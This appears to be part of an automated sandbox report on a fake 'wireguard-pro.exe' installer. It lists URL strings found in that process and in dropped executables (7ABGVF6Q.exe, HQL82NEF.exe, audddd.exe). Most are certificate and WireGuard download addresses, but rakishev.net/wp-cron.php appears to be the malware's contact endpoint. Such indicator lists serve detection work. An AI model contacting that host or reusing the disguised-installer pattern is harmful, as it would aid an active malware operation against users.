Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr	String found in binary or memory: http://ocsp.entrust.net00
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr	String found in binary or memory: http://ocsp.entrust.net01
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr, 51c702.msi.4.dr, 7ABGVF6Q.exe.0.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.618947019.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net1.3.6.1.5.5.7.48.2http://aia.entrust.net/evcs2-chain.p7c
Source: 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net1.3.6.1.5.5.7.48.2http://aia.entrust.net/ts2-chain256.cer
Source: 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net:80
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.netI
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.netb
Source: 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crl
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crl9
Source: 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crlZ
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/evcs2.crl0
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/evcs2.crlO
Source: 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/g2ca.crl
Source: 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nethttp://crl.entrust.net/ts2ca.crl
Source: 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.nett
Source: HQL82NEF.exe, 00000003.00000002.1130370284.0000000003091000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003021000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003267000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000312C000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000315F000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rakishev.net
Source: wireguard-pro.exe, 00000000.00000002.618991425.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000011.00000002.821401870.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: wireguard.exe, 00000007.00000002.638198427.000000C000152000.00000004.00001000.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.637722285.000000C000056000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.entrust.net/rpa
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr	String found in binary or memory: http://www.entrust.net/rpa0
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: wireguard.exe, 00000007.00000002.637722285.000000C000056000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.entrust.net/rpa2.23.140.1.3
Source: 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769603096.0000028D9BFCB000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.639594156.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769716348.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/
Source: wireguard.exe, 00000009.00000003.639594156.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/L8
Source: wireguard.exe, 00000009.00000003.639594156.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/v8
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 7ABGVF6Q.exe, 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe, 00000002.00000000.613733198.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe.0.dr	String found in binary or memory: https://download.wireguard.com/windows-client/
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe, 00000002.00000000.613733198.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe.0.dr	String found in binary or memory: https://download.wireguard.com/windows-client/WireGuard:
Source: wireguard.exe, 00000009.00000003.769647770.0000028D9BF90000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769662449.0000028D9BF93000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769643610.0000028D9BFB6000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.639789020.0000028D9BFB5000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000002.1131984364.0000028D9BF98000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.639789020.0000028D9BF90000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000002.1132028506.0000028D9BFB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/windows-client/latest.sig
Source: wireguard.exe, 00000009.00000003.769643610.0000028D9BFB6000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.639789020.0000028D9BFB5000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000002.1132028506.0000028D9BFB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/windows-client/latest.signcreasep
Source: 7ABGVF6Q.exe, 00000002.00000003.636569317.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/windows-client/wireguard-amd64-0.5.3.msi
Source: 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.wireguard.com/windows-client/wireguard-amd64-0.5.3.msioL
Source: HQL82NEF.exe, 00000003.00000002.1130370284.0000000003021000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003130000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003118000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003218000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003267000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000312C000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003021000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000315F000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rakishev.net
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003021000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	String found in binary or memory: https://rakishev.net/wp-cron.php
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: wireguard.exe, 00000007.00000002.638198427.000000C000174000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.entrust.net/rpa
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.618947019.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.entrust.net/rpa0
Source: wireguard.exe, 00000007.00000002.638198427.000000C000174000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.entrust.net/rpa2.23.140.1.3
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, MSIC943.tmp.4.dr	String found in binary or memory: https://www.wireguard.com/
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000000.613742894.0000000000313000.00000002.00000001.01000000.00000007.sdmp, wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, 7ABGVF6Q.exe.0.dr	String found in binary or memory: https://www.wireguard.com/D
